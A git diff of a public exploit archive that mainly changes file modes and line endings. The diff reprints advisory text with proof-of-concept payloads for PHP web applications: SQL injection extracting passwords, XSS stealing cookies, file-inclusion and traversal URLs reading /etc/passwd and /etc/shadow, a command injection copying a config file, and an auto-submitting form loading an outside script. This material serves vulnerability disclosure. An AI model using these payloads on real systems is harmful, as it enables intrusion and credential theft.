11436b544..797a13045 --- a/platforms/php/webapps/29534.txt +++ b/platforms/php/webapps/29534.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce This issue affects version 3.40; other versions may also be vulnerable. -http://www.example.com/rss/show_webfeed.php?wcCategory=0&wcHeadlines=[SQL] \ No newline at end of file +http://www.example.com/rss/show_webfeed.php?wcCategory=0&wcHeadlines=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/29537.txt b/platforms/php/webapps/29537.txt old mode 100755 new mode 100644 index 6f655c20d..083e31dba --- a/platforms/php/webapps/29537.txt +++ b/platforms/php/webapps/29537.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce Version 1.0.76 is vulnerable to this issue; other versions may also be affected. -http://www.example.com/index.php?module=News&startrow='[sql injection] \ No newline at end of file +http://www.example.com/index.php?module=News&startrow='[sql injection] \ No newline at end of file diff --git a/platforms/php/webapps/29539.txt b/platforms/php/webapps/29539.txt old mode 100755 new mode 100644 index 3bbe5535e..ae6367415 --- a/platforms/php/webapps/29539.txt +++ b/platforms/php/webapps/29539.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th This issue affects EncapsCMS 0.3.6; other versions may also be vulnerable. -http://www.example.com/encapscms-0.3.6/common_foot.php?config[path]=evilcode? \ No newline at end of file +http://www.example.com/encapscms-0.3.6/common_foot.php?config[path]=evilcode? \ No newline at end of file diff --git a/platforms/php/webapps/29544.txt b/platforms/php/webapps/29544.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2955.txt b/platforms/php/webapps/2955.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29556.txt b/platforms/php/webapps/29556.txt old mode 100755 new mode 100644 index b3c8c011f..8cd5fa3f9 --- a/platforms/php/webapps/29556.txt +++ b/platforms/php/webapps/29556.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th This issue affects version 2.8.2; other versions may also be vulnerable. -http://www.example.com/openemr-2.8.2/custom/import_xml.php?srcdir=evilcode \ No newline at end of file +http://www.example.com/openemr-2.8.2/custom/import_xml.php?srcdir=evilcode \ No newline at end of file diff --git a/platforms/php/webapps/29557.txt b/platforms/php/webapps/29557.txt old mode 100755 new mode 100644 index c1ba52678..2ed3e5316 --- a/platforms/php/webapps/29557.txt +++ b/platforms/php/webapps/29557.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects version 2.8.2; other versions may also be vulnerable. -http://www.example.com/openemr/interface/login/login_frame.php?rootdir=[XSS] \ No newline at end of file +http://www.example.com/openemr/interface/login/login_frame.php?rootdir=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/29559.txt b/platforms/php/webapps/29559.txt old mode 100755 new mode 100644 index a0493ec37..bcb9fe84f --- a/platforms/php/webapps/29559.txt +++ b/platforms/php/webapps/29559.txt @@ -13,4 +13,4 @@ An attacker can exploit this issue via a web client. The following proof-of-concept URIs are available: http://www.example.com/easymoblog/add_comment.php?i='[SQL] -http://www.example.com/easymoblog/img.php?i='[XSS] \ No newline at end of file +http://www.example.com/easymoblog/img.php?i='[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/2956.txt b/platforms/php/webapps/2956.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29560.txt b/platforms/php/webapps/29560.txt old mode 100755 new mode 100644 index b5bf0c8e3..31e9bd2b4 --- a/platforms/php/webapps/29560.txt +++ b/platforms/php/webapps/29560.txt @@ -4,4 +4,4 @@ PHPProbid is prone to a remote file-include vulnerability because it fails to su Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. -http://example.com//lang.php?lang=<i*****%20height=1000%20width=1000%2 0src=http://Shell-Attack/> \ No newline at end of file +http://example.com//lang.php?lang=<i*****%20height=1000%20width=1000%2 0src=http://Shell-Attack/> \ No newline at end of file diff --git a/platforms/php/webapps/29561.txt b/platforms/php/webapps/29561.txt old mode 100755 new mode 100644 index 3b4774c9b..14df29757 --- a/platforms/php/webapps/29561.txt +++ b/platforms/php/webapps/29561.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Version 2.7.10 is vulnerable to this issue; other versions may also be affected. -http://www.example.com/imap/index.php?lid=en_UK&tid=default&f_user=XSS \ No newline at end of file +http://www.example.com/imap/index.php?lid=en_UK&tid=default&f_user=XSS \ No newline at end of file diff --git a/platforms/php/webapps/29562.txt b/platforms/php/webapps/29562.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29563.txt b/platforms/php/webapps/29563.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29564.txt b/platforms/php/webapps/29564.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29565.txt b/platforms/php/webapps/29565.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29566.txt b/platforms/php/webapps/29566.txt old mode 100755 new mode 100644 index 079d8425f..a8ce31a08 --- a/platforms/php/webapps/29566.txt +++ b/platforms/php/webapps/29566.txt @@ -6,4 +6,4 @@ A successful exploit of these issues allows an attacker to execute arbitrary ser PortailPHP 2 is vulnerable to these issues; other versions may also be affected. -http://www.example.commod_search/index.php?chemin=http://site.com/file.txt?%00 \ No newline at end of file +http://www.example.commod_search/index.php?chemin=http://site.com/file.txt?%00 \ No newline at end of file diff --git a/platforms/php/webapps/29568.txt b/platforms/php/webapps/29568.txt old mode 100755 new mode 100644 index 28d1b38d7..13a33cf88 --- a/platforms/php/webapps/29568.txt +++ b/platforms/php/webapps/29568.txt @@ -4,4 +4,4 @@ Coppermine Photo Gallery is prone to multiple remote and local file-include vuln An attacker can exploit these issues to execute arbitrary PHP code in the context of the webserver process. This may facilitate a remote compromise of the underlying system; other attacks are also possible. -http://www.example.com/bridge/enigma/E2_header.inc.php?boarddir=http://evil_scripts? \ No newline at end of file +http://www.example.com/bridge/enigma/E2_header.inc.php?boarddir=http://evil_scripts? \ No newline at end of file diff --git a/platforms/php/webapps/29569.txt b/platforms/php/webapps/29569.txt old mode 100755 new mode 100644 index 1040711d6..0ff88f417 --- a/platforms/php/webapps/29569.txt +++ b/platforms/php/webapps/29569.txt @@ -4,4 +4,4 @@ MySQLNewsEngine is prone to a remote file-include vulnerability because it fails Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. -http://www.example.com/affichearticles.php3?newsenginedir=[attacker] \ No newline at end of file +http://www.example.com/affichearticles.php3?newsenginedir=[attacker] \ No newline at end of file diff --git a/platforms/php/webapps/2957.txt b/platforms/php/webapps/2957.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29571.txt b/platforms/php/webapps/29571.txt old mode 100755 new mode 100644 index 3754a5c71..21f9af612 --- a/platforms/php/webapps/29571.txt +++ b/platforms/php/webapps/29571.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary commands with superuser NOTE: To exploit this issue, an attacker must have authenticated access to a customer control panel. -"; cp /var/www/syscp/lib/userdata.inc.php /var/[user]/webs/web1/; ls " \ No newline at end of file +"; cp /var/www/syscp/lib/userdata.inc.php /var/[user]/webs/web1/; ls " \ No newline at end of file diff --git a/platforms/php/webapps/29572.txt b/platforms/php/webapps/29572.txt old mode 100755 new mode 100644 index 5d6178726..c3df79ab2 --- a/platforms/php/webapps/29572.txt +++ b/platforms/php/webapps/29572.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow cPanel 11.0.0 and prior versions are vulnerable to this issue. -http://www.example.com/scripts/passwdmysql?password=[xss]&user=root&submit=Change+Password \ No newline at end of file +http://www.example.com/scripts/passwdmysql?password=[xss]&user=root&submit=Change+Password \ No newline at end of file diff --git a/platforms/php/webapps/29574.php b/platforms/php/webapps/29574.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29578.txt b/platforms/php/webapps/29578.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29579.txt b/platforms/php/webapps/29579.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2958.txt b/platforms/php/webapps/2958.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29580.txt b/platforms/php/webapps/29580.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29581.txt b/platforms/php/webapps/29581.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29582.txt b/platforms/php/webapps/29582.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29583.txt b/platforms/php/webapps/29583.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29584.txt b/platforms/php/webapps/29584.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29585.txt b/platforms/php/webapps/29585.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29586.txt b/platforms/php/webapps/29586.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29587.txt b/platforms/php/webapps/29587.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29588.txt b/platforms/php/webapps/29588.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29589.txt b/platforms/php/webapps/29589.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29590.txt b/platforms/php/webapps/29590.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29591.txt b/platforms/php/webapps/29591.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29592.txt b/platforms/php/webapps/29592.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29593.txt b/platforms/php/webapps/29593.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29598.txt b/platforms/php/webapps/29598.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29599.txt b/platforms/php/webapps/29599.txt old mode 100755 new mode 100644 index 9e617681c..82d2bbfe8 --- a/platforms/php/webapps/29599.txt +++ b/platforms/php/webapps/29599.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow TaskFreak! 0.5.5 multiuser edition is reportedly vulnerable; other versions may be affected as well. -http://127.0.0.1/path/search?q=%22%3E%3Cscript%3Ealert%28%27bl4ck%27%29%3C%2Fscript%3E \ No newline at end of file +http://127.0.0.1/path/search?q=%22%3E%3Cscript%3Ealert%28%27bl4ck%27%29%3C%2Fscript%3E \ No newline at end of file diff --git a/platforms/php/webapps/29602.txt b/platforms/php/webapps/29602.txt old mode 100755 new mode 100644 index c56073384..cf204e0ec --- a/platforms/php/webapps/29602.txt +++ b/platforms/php/webapps/29602.txt @@ -6,4 +6,4 @@ A successful exploit of these vulnerabilities could allow an attacker to comprom WebTester 5.0.20060927 and prior versions are vulnerable. -http://www.example.com/webtester/directions.php?testID=\' \ No newline at end of file +http://www.example.com/webtester/directions.php?testID=\' \ No newline at end of file diff --git a/platforms/php/webapps/29604.txt b/platforms/php/webapps/29604.txt old mode 100755 new mode 100644 index a6bc52eb8..5441b1a70 --- a/platforms/php/webapps/29604.txt +++ b/platforms/php/webapps/29604.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce This issue affects version 2.5.9+; other versions may also be vulnerable. -http://www.example.com/forum/arcade.php?act=Arcade%20search_type=0&gsearch=' union select password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 from user where userid = USERID /* \ No newline at end of file +http://www.example.com/forum/arcade.php?act=Arcade%20search_type=0&gsearch=' union select password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 from user where userid = USERID /* \ No newline at end of file diff --git a/platforms/php/webapps/29605.txt b/platforms/php/webapps/29605.txt old mode 100755 new mode 100644 index 6b099a0de..b0a7bdf8f --- a/platforms/php/webapps/29605.txt +++ b/platforms/php/webapps/29605.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects version 1.1.0; other versions may also be affected. -http://www.example.com/dp/faq.php?article=[xss] \ No newline at end of file +http://www.example.com/dp/faq.php?article=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/29606.txt b/platforms/php/webapps/29606.txt old mode 100755 new mode 100644 index 29cbbc122..53e9aced7 --- a/platforms/php/webapps/29606.txt +++ b/platforms/php/webapps/29606.txt @@ -4,4 +4,4 @@ Calendar Express is prone to a cross-site scripting vulnerability because the ap An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://127.0.0.1/path/search?q=%22%3E%3Cscript%3Ealert%28%27bl4ck%27%29%3C%2Fscript%3E \ No newline at end of file +http://127.0.0.1/path/search?q=%22%3E%3Cscript%3Ealert%28%27bl4ck%27%29%3C%2Fscript%3E \ No newline at end of file diff --git a/platforms/php/webapps/29608.txt b/platforms/php/webapps/29608.txt old mode 100755 new mode 100644 index 16673aff6..71f6b8385 --- a/platforms/php/webapps/29608.txt +++ b/platforms/php/webapps/29608.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary PHP code in the context This issue affects version 1.31; prior versions may also be affected. -http://www.example.com/cedstat/index.php?hier=%3C%68%31%3E%74%65%73%74%65%64%20%62%79%20%73%6E%30%6F%50%79%3C%2F%68%31%3E \ No newline at end of file +http://www.example.com/cedstat/index.php?hier=%3C%68%31%3E%74%65%73%74%65%64%20%62%79%20%73%6E%30%6F%50%79%3C%2F%68%31%3E \ No newline at end of file diff --git a/platforms/php/webapps/29609.txt b/platforms/php/webapps/29609.txt old mode 100755 new mode 100644 index 425378aa5..69f334ef6 --- a/platforms/php/webapps/29609.txt +++ b/platforms/php/webapps/29609.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary PHP code in the context This issue affects version 1.1.1; other versions may also be affected. -http://www.example.com/path/include.php?_SERVER[DOCUMENT_ROOT]=[shell] \ No newline at end of file +http://www.example.com/path/include.php?_SERVER[DOCUMENT_ROOT]=[shell] \ No newline at end of file diff --git a/platforms/php/webapps/29610.txt b/platforms/php/webapps/29610.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29615.txt b/platforms/php/webapps/29615.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29621.txt b/platforms/php/webapps/29621.txt old mode 100755 new mode 100644 index 0b2bb70ca..c4903e231 --- a/platforms/php/webapps/29621.txt +++ b/platforms/php/webapps/29621.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Version 2.20.3 is vulnerable; other versions may also be affected. -http://www.example.com/calendar/index.php?go="><script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/calendar/index.php?go="><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/29624.txt b/platforms/php/webapps/29624.txt old mode 100755 new mode 100644 index 8052516e7..2c5b413c1 --- a/platforms/php/webapps/29624.txt +++ b/platforms/php/webapps/29624.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow CedStat 1.31 and prior versions are vulnerable. -http://www.example.com/cedstat/index.php?hier=%3C%68%31%3E%74%65%73%74%65%64%20%62%79%20%73%6E%30%6F%50%79%3C%2F%68%31%3E \ No newline at end of file +http://www.example.com/cedstat/index.php?hier=%3C%68%31%3E%74%65%73%74%65%64%20%62%79%20%73%6E%30%6F%50%79%3C%2F%68%31%3E \ No newline at end of file diff --git a/platforms/php/webapps/29625.txt b/platforms/php/webapps/29625.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29626.txt b/platforms/php/webapps/29626.txt old mode 100755 new mode 100644 index 3bf28c4e8..9a65a0856 --- a/platforms/php/webapps/29626.txt +++ b/platforms/php/webapps/29626.txt @@ -6,4 +6,4 @@ An attacker can exploit these vulnerabilities to retrieve arbitrary files from t phpTrafficA version 1.4.1 is vulnerable to these issues. -http://www.example.com/phpTrafficA/banref.php?lang=/../../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/phpTrafficA/banref.php?lang=/../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/29627.php b/platforms/php/webapps/29627.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29628.txt b/platforms/php/webapps/29628.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29629.txt b/platforms/php/webapps/29629.txt old mode 100755 new mode 100644 index 8bdef0b97..2450d57ff --- a/platforms/php/webapps/29629.txt +++ b/platforms/php/webapps/29629.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to execute arbitrary PHP code in the contex These issues affects version 1.0.2; other versions may also be vulnerable. - http://www.example.com/n_layouts.php?link_parameters="><script>alert(document.cookie);</script> \ No newline at end of file + http://www.example.com/n_layouts.php?link_parameters="><script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/29631.txt b/platforms/php/webapps/29631.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29632.txt b/platforms/php/webapps/29632.txt old mode 100755 new mode 100644 index dbe841420..07e60b754 --- a/platforms/php/webapps/29632.txt +++ b/platforms/php/webapps/29632.txt @@ -8,4 +8,4 @@ http://www.example.com/pyrophobia/?act=../../../../../../../../../../../../file. http://www.example.com/pyrophobia/?pid=../../../../../../../../../../../../file.ext%00 -http://www.example.com/pyrophobia/admin/index.php?action=../../../../../../../../../../../../../file.ext%00 \ No newline at end of file +http://www.example.com/pyrophobia/admin/index.php?action=../../../../../../../../../../../../../file.ext%00 \ No newline at end of file diff --git a/platforms/php/webapps/29634.txt b/platforms/php/webapps/29634.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29635.txt b/platforms/php/webapps/29635.txt old mode 100755 new mode 100644 index b0bc32d78..66b1b213e --- a/platforms/php/webapps/29635.txt +++ b/platforms/php/webapps/29635.txt @@ -4,4 +4,4 @@ Pheap is prone to a directory-traversal vulnerability because it fails to proper An attacker can exploit this vulnerability to retrieve and edit the contents of arbitrary files from the vulnerable system in the context of the affected application. -http://www.example.com/edit.php?em=file&filename=../../../../../../../../../../../../../etc/passwd \ No newline at end of file +http://www.example.com/edit.php?em=file&filename=../../../../../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/29636.txt b/platforms/php/webapps/29636.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29637.txt b/platforms/php/webapps/29637.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29638.txt b/platforms/php/webapps/29638.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29639.txt b/platforms/php/webapps/29639.txt old mode 100755 new mode 100644 index 2b2ddf986..40b94f703 --- a/platforms/php/webapps/29639.txt +++ b/platforms/php/webapps/29639.txt @@ -4,4 +4,4 @@ LoveCMS is prone to multiple input-validation vulnerabilities, including an arbi An attacker can exploit these issues to steal cookie-based authentication credentials, upload an arbitrary PHP file, execute the file on the vulnerable computer in the context of the webserver process, retrieve arbitrary files from the vulnerable system in the context of the affected application, and delete arbitrary files on the server. -http://www.example.com/lovecms/?load=content&id=[xss] \ No newline at end of file +http://www.example.com/lovecms/?load=content&id=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/2964.txt b/platforms/php/webapps/2964.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29640.txt b/platforms/php/webapps/29640.txt old mode 100755 new mode 100644 index 17edbeb6f..b5f7e7650 --- a/platforms/php/webapps/29640.txt +++ b/platforms/php/webapps/29640.txt @@ -4,4 +4,4 @@ Shop Kit Plus is prone to a local file-include vulnerability because it fails to An attacker can exploit this vulnerability using directory-traversal strings to execute local script code in the context of the application. This may allow the attacker to access sensitive information that may aid in further attacks. -http://www.example.com/shopkitplus/enc/stylecss.php?changetheme=../../../../../../../../../../../../etc/passwd \ No newline at end of file +http://www.example.com/shopkitplus/enc/stylecss.php?changetheme=../../../../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/29641.txt b/platforms/php/webapps/29641.txt old mode 100755 new mode 100644 index 27455eabe..39a7594c8 --- a/platforms/php/webapps/29641.txt +++ b/platforms/php/webapps/29641.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an unauthorized user to view files and execute l xt:Commerce 3.04 and prior versions are vulnerable to this issue. -http://www.example.com/index.php?currency=EUR&manufacturers_id=1&template=../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/index.php?currency=EUR&manufacturers_id=1&template=../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/29642.txt b/platforms/php/webapps/29642.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29643.txt b/platforms/php/webapps/29643.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29644.txt b/platforms/php/webapps/29644.txt old mode 100755 new mode 100644 index d66916eb5..1fda828a8 --- a/platforms/php/webapps/29644.txt +++ b/platforms/php/webapps/29644.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an unauthorized user to view files and execute l Version 0.3 is vulnerable to this issue; other versions may also be affected. -http://www.example.com/Pickle/src/download.php?img=1&file=../../../../../../../../../../../../../etc/shadow&rotation=0&img=0 \ No newline at end of file +http://www.example.com/Pickle/src/download.php?img=1&file=../../../../../../../../../../../../../etc/shadow&rotation=0&img=0 \ No newline at end of file diff --git a/platforms/php/webapps/29645.txt b/platforms/php/webapps/29645.txt old mode 100755 new mode 100644 index 66c2886bf..1ece521c6 --- a/platforms/php/webapps/29645.txt +++ b/platforms/php/webapps/29645.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an unauthorized user to view files and execute l Version 1.2.0 is vulnerable; other versions may also be affected. -http://www.example.com/activecalendar/data/showcode.php?page=../../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/activecalendar/data/showcode.php?page=../../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/29646.txt b/platforms/php/webapps/29646.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29647.txt b/platforms/php/webapps/29647.txt old mode 100755 new mode 100644 index ec13e301e..0837dc36f --- a/platforms/php/webapps/29647.txt +++ b/platforms/php/webapps/29647.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Active Calendar 1.2.0 is vulnerable; other versions may also be affected. -http://www.example.com/activecalendar/data/js.php?css="><script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/activecalendar/data/js.php?css="><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/29648.txt b/platforms/php/webapps/29648.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29649.txt b/platforms/php/webapps/29649.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2965.txt b/platforms/php/webapps/2965.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29650.txt b/platforms/php/webapps/29650.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29651.txt b/platforms/php/webapps/29651.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29652.txt b/platforms/php/webapps/29652.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29653.txt b/platforms/php/webapps/29653.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29658.txt b/platforms/php/webapps/29658.txt old mode 100755 new mode 100644 index 05ac94a29..9c286f9cc --- a/platforms/php/webapps/29658.txt +++ b/platforms/php/webapps/29658.txt @@ -4,4 +4,4 @@ PhotoStand is prone to a cross-site scripting vulnerability because the applicat An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/index.php?page=search&q=<script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/index.php?page=search&q=<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/29661.txt b/platforms/php/webapps/29661.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29662.txt b/platforms/php/webapps/29662.txt old mode 100755 new mode 100644 index d252ec671..6ca04f7b7 --- a/platforms/php/webapps/29662.txt +++ b/platforms/php/webapps/29662.txt @@ -4,4 +4,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Docebo 3.0.5 and prior versions are vulnerable; other versions may also be affected. -http://www.example.com/doceboScs/modules/htmlframechat/index.php?sn=<script>alert('XSS');</script> http://www.example.com/doceboScs/modules/htmlframechat/index.php?ri=<script>alert('XSS');</script> \ No newline at end of file +http://www.example.com/doceboScs/modules/htmlframechat/index.php?sn=<script>alert('XSS');</script> http://www.example.com/doceboScs/modules/htmlframechat/index.php?ri=<script>alert('XSS');</script> \ No newline at end of file diff --git a/platforms/php/webapps/29663.txt b/platforms/php/webapps/29663.txt old mode 100755 new mode 100644 index 0f8d99b1c..2f8b65aaa --- a/platforms/php/webapps/29663.txt +++ b/platforms/php/webapps/29663.txt @@ -4,4 +4,4 @@ SolarPay is prone to a local file-include vulnerability because the utility fail Successfully exploiting this issue allows attackers to gain access to files located in directories they do not have permissions to access. Information that attackers harvest may aid them in further attacks. -http://www.example.com/index.php?read=../admin/a_searchu.php \ No newline at end of file +http://www.example.com/index.php?read=../admin/a_searchu.php \ No newline at end of file diff --git a/platforms/php/webapps/29665.txt b/platforms/php/webapps/29665.txt old mode 100755 new mode 100644 index ef63f810f..fecfa7386 --- a/platforms/php/webapps/29665.txt +++ b/platforms/php/webapps/29665.txt @@ -9,4 +9,4 @@ SQLiteManager 1.2.0 is vulnerable to this issue; other versions may also be affe GET /home/sqlite/ HTTP/1.0 [...] Cookie: PHPSESSID=[...];SQLiteManager_currentTheme=../../../../../../../../../../../../../etc/passwd%00; -SQLiteManager_currentLangue=deleted \ No newline at end of file +SQLiteManager_currentLangue=deleted \ No newline at end of file diff --git a/platforms/php/webapps/29667.txt b/platforms/php/webapps/29667.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29668.txt b/platforms/php/webapps/29668.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29669.txt b/platforms/php/webapps/29669.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29670.txt b/platforms/php/webapps/29670.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29672.txt b/platforms/php/webapps/29672.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29676.txt b/platforms/php/webapps/29676.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29677.txt b/platforms/php/webapps/29677.txt old mode 100755 new mode 100644 index be8a17fc4..dd4b38c42 --- a/platforms/php/webapps/29677.txt +++ b/platforms/php/webapps/29677.txt @@ -4,4 +4,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica Audins Audiens version 3.3 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/setup.php/>"><ScRiPt>alert('XSS')%3B</ScRiPt> \ No newline at end of file +http://www.example.com/[path]/setup.php/>"><ScRiPt>alert('XSS')%3B</ScRiPt> \ No newline at end of file diff --git a/platforms/php/webapps/29678.txt b/platforms/php/webapps/29678.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29679.html b/platforms/php/webapps/29679.html old mode 100755 new mode 100644 index b92fc693e..60bd9b2fd --- a/platforms/php/webapps/29679.html +++ b/platforms/php/webapps/29679.html @@ -23,4 +23,4 @@ User Number: <input type="text" name="u" size="5"> </form> </body> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/php/webapps/2968.php b/platforms/php/webapps/2968.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29680.html b/platforms/php/webapps/29680.html old mode 100755 new mode 100644 index cf8ee6431..6d733e89e --- a/platforms/php/webapps/29680.html +++ b/platforms/php/webapps/29680.html @@ -6,4 +6,4 @@ Exploiting these issues may allow an attacker to execute HTML and script code in Version 1.2.0 is vulnerable; other versions may also be affected. -<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <body> <form id="editform" name="editform" method="post" action="http://www.example.com/sqlitemanager/main.php" enctype="multipart/form-data"> <input type="text" name="dbname" value='"><script src=http://www.0x000000.com/x.js></script><"' /> <input type="text" name="dbVersion" value="2" /> <input type="text" name="dbRealpath" value="" /> <input type="text" name="filename" value="" /> <input type="text" name="dbpath" value="" /> <input type="text" name="action" value="saveDb" /> <input name="Save" value="Save page" type="submit"> </form> <script>document.forms[0].submit();</script> </body> </html> \ No newline at end of file +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <body> <form id="editform" name="editform" method="post" action="http://www.example.com/sqlitemanager/main.php" enctype="multipart/form-data"> <input type="text" name="dbname" value='"><script src=http://www.0x000000.com/x.js></script><"' /> <input type="text" name="dbVersion" value="2" /> <input type="text" name="dbRealpath" value="" /> <input type="text" name="filename" value="" /> <input type="text" name="dbpath" value="" /> <input type="text" name="action" value="saveDb" /> <input name="Save" value="Save page" type="submit"> </form> <script>document.forms[0].submit();</script> </body> </html> \ No newline at end of file diff --git a/platforms/php/webapps/29681.txt b/platforms/php/webapps/29681.txt old mode 100755 new mode 100644 index d4a606a51..011875c02 --- a/platforms/php/webapps/29681.txt +++ b/platforms/php/webapps/29681.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an unauthorized user to view files and execute l Pagesetter 6.3.0 beta 5 and prior versions are vulnerable to this issue. -http://www.example.com/index.php?module=Pagesetter&type=file&func=preview&id=../../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/index.php?module=Pagesetter&type=file&func=preview&id=../../../../../../../../../etc/passwd%00 \ No newline at end 